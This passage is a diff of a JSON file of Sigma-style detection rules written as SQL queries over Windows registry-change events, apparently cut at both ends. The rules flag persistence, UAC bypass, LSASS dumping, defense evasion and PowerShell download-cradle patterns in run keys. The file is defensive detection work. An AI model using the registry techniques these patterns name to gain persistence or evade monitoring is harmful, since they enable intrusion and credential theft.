OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" ], - "filename": "registry_set_fax_dll_persistance.yml" + "filename": "registry_event_susp_atbroker_change.yml" }, { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", - "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "status": "experimental", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_susp_printer_driver.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Suspicious Powershell In Registry Run Keys", - "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "status": "experimental", - "description": "Detects potential PowerShell commands or code within registry run keys", - "author": "frack113, Florian Roth", + "title": "Windows Registry Trust Record Modification", + "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "status": "test", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "author": "Antonlovesdnb", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate admin or third party scripts. Baseline according to your environment" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh %' ESCAPE '\\' OR NewValue LIKE '%FromBase64String%' ESCAPE '\\' OR NewValue LIKE '%.DownloadFile(%' ESCAPE '\\' OR NewValue LIKE '%.DownloadString(%' ESCAPE '\\' OR NewValue LIKE '% -w hidden %' ESCAPE '\\' OR NewValue LIKE '% -w 1 %' ESCAPE '\\' OR NewValue LIKE '%-windowstyle hidden%' ESCAPE '\\' OR NewValue LIKE '%-window hidden%' ESCAPE '\\' OR NewValue LIKE '% -nop %' ESCAPE '\\' OR NewValue LIKE '% -encodedcommand %' ESCAPE '\\' OR NewValue LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Expression%' ESCAPE '\\' OR NewValue LIKE '%IEX (%' ESCAPE '\\' OR NewValue LIKE '%Invoke-Command%' ESCAPE '\\' OR NewValue LIKE '%ICM -%' ESCAPE '\\' OR NewValue LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR NewValue LIKE '%IWR %' ESCAPE '\\' OR NewValue LIKE '% -noni %' ESCAPE '\\' OR NewValue LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" ], - "filename": "registry_set_powershell_in_run_keys.yml" + "filename": "registry_event_trust_record_modification.yml" }, { - "title": "DNS-over-HTTPS Enabled by Registry", - "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "author": "Austin Songer", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1112" - ], - "falsepositives": [ - "Unlikely" + "attack.persistence", + "attack.t1547.001" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND NewValue = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_dns_over_https_enabled.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "ScreenSaver Registry Key Set", - "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use of screen saver" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND NewValue LIKE '%.scr' ESCAPE '\\') AND NOT ((NewValue LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.impact", - "attack.t1490" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_system_restore.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_add_port_monitor.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", - "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", - "status": "experimental", - "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", - "author": "frack113", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "status": "test", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", + "status": "test", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Winlogon AllowMultipleTSSessions Enable", - "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1112" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of the multi session functionality" + "Legitimate administrators removing applications (should always be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND NewValue LIKE '%DWORD (0x00000001)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Disable Privacy Settings Experience in Registry", - "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "title": "Removal Of Index Value to Hide Schedule Task - Registry", + "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "status": "experimental", - "description": "Detects registry modifications that disable Privacy Settings Experience", - "author": "frack113", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" ], - "filename": "registry_set_disable_privacy_settings_experience.yml" + "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" }, { - "title": "Allow RDP Remote Assistance Feature", - "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "status": "experimental", - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "author": "frack113", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1070", "attack.t1112" ], "falsepositives": [ - "Legitimate use of the feature (alerts should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server 